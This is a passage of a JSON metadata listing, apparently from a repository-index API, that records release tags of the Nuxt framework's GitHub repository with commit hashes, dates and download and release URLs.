0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0",